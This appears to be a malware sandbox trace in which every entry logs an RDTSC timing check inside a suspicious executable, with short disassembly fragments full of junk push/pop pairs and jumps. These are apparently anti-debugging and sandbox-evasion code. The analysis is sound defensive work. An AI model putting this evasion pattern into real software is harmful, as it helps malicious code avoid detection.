Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B701D second address: 3B7023 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B7023 second address: 3B7029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B7029 second address: 3B703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B719B second address: 3B719F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B72FB second address: 3B7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B7303 second address: 3B7309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B7309 second address: 3B730D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33CFA5 second address: 33CFCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33CFCB second address: 33CFEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4086h 0x00000007 jmp 00007F3A94CD407Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3BF90C second address: 3BF930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3BF930 second address: 3BF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3BF936 second address: 3BF980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F0h 0x00000009 popad 0x0000000a jp 00007F3A9502B5F2h 0x00000010 push ecx 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 jmp 00007F3A9502B5EEh 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37827E second address: 3604AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a call dword ptr [ebp+122D2272h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37832B second address: 378331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 378331 second address: 378336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37878F second address: 3787AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 378923 second address: 37892E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37892E second address: 378991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 pushad 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c jg 00007F3A9502B602h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F3A9502B5E6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 378991 second address: 3789DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4089h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov ecx, 6DD6FF35h 0x00000012 push D0022165h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F3A94CD408Eh 0x0000001f jmp 00007F3A94CD4088h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3789DC second address: 3789E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F3A9502B5E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 378ADF second address: 378AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 378E29 second address: 378E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 379192 second address: 37919D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37919D second address: 3791B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3791B0 second address: 3791B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3791B4 second address: 3791D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3791D1 second address: 3791D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3791D7 second address: 3791DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37959D second address: 360F8A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4078h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F3A94CD407Ah 0x00000011 nop 0x00000012 mov cx, si 0x00000015 call dword ptr [ebp+122D192Fh] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F3A94CD4076h 0x00000024 jo 00007F3A94CD4076h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C000B second address: 3C000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C000F second address: 3C0019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0019 second address: 3C0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0022 second address: 3C0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3A94CD4080h 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0040 second address: 3C0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0046 second address: 3C005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jng 00007F3A94CD40A9h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F3A94CD4076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C005F second address: 3C0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0068 second address: 3C006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C01B8 second address: 3C01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C030E second address: 3C031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F3A94CD4076h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C031C second address: 3C0325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0325 second address: 3C032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C032B second address: 3C0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C0348 second address: 3C034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2F93 second address: 3C2FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5F1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2FB5 second address: 3C2FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2FB9 second address: 3C2FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2B1F second address: 3C2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2B23 second address: 3C2B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F3A9502B5F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2B41 second address: 3C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C2B4B second address: 3C2B5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A9502B5ECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C5A8C second address: 3C5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C5A90 second address: 3C5AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5F2h 0x0000000c jp 00007F3A9502B5E6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jns 00007F3A9502B5F9h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3C5AD2 second address: 3C5AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 jmp 00007F3A94CD407Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3CCA32 second address: 3CCA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3CCA36 second address: 3CCAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3A94CD407Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F3A94CD408Ah 0x00000011 jmp 00007F3A94CD407Ah 0x00000016 jmp 00007F3A94CD407Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A94CD4088h 0x00000023 pushad 0x00000024 jns 00007F3A94CD4076h 0x0000002a jmp 00007F3A94CD4080h 0x0000002f jmp 00007F3A94CD407Fh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37900A second address: 379031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F3A9502B5E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3A9502B5F6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D033A second address: 3D0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D0340 second address: 3D0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D0344 second address: 3D0377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A94CD4089h 0x0000000d jmp 00007F3A94CD4082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D0377 second address: 3D037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D04D2 second address: 3D04FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F3A94CD4078h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D04FA second address: 3D053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 jmp 00007F3A9502B5EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F3A9502B602h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jg 00007F3A9502B5E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D3DCC second address: 3D3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D3DD0 second address: 3D3DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D3DDF second address: 3D3E1B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD408Eh 0x00000008 jmp 00007F3A94CD4085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D405E second address: 3D4078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A9502B5F0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3D4078 second address: 3D407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DB0AE second address: 3DB0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3A9502B5ECh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DB785 second address: 3DB78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DBD01 second address: 3DBD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DC00A second address: 3DC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3A94CD4076h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DC2F2 second address: 3DC308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DC5F8 second address: 3DC616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD4089h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DCC0B second address: 3DCC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DCC0F second address: 3DCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3DCC17 second address: 3DCC2B instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007F3A9502B5E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E01B2 second address: 3E01DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F3A94CD407Ch 0x0000000d jne 00007F3A94CD4076h 0x00000013 jnc 00007F3A94CD4078h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F3A94CD4076h 0x00000024 jns 00007F3A94CD4076h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E01DE second address: 3E01F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E04BF second address: 3E04C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E04C5 second address: 3E04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jne 00007F3A9502B5F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F3A9502B5E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E04EF second address: 3E0503 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F3A94CD4076h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E07A3 second address: 3E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E07A7 second address: 3E07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3A94CD4080h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E08F2 second address: 3E0912 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 jno 00007F3A9502B5E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E0912 second address: 3E0935 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4083h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E0935 second address: 3E093E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3E0A7D second address: 3E0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ED888 second address: 3ED892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
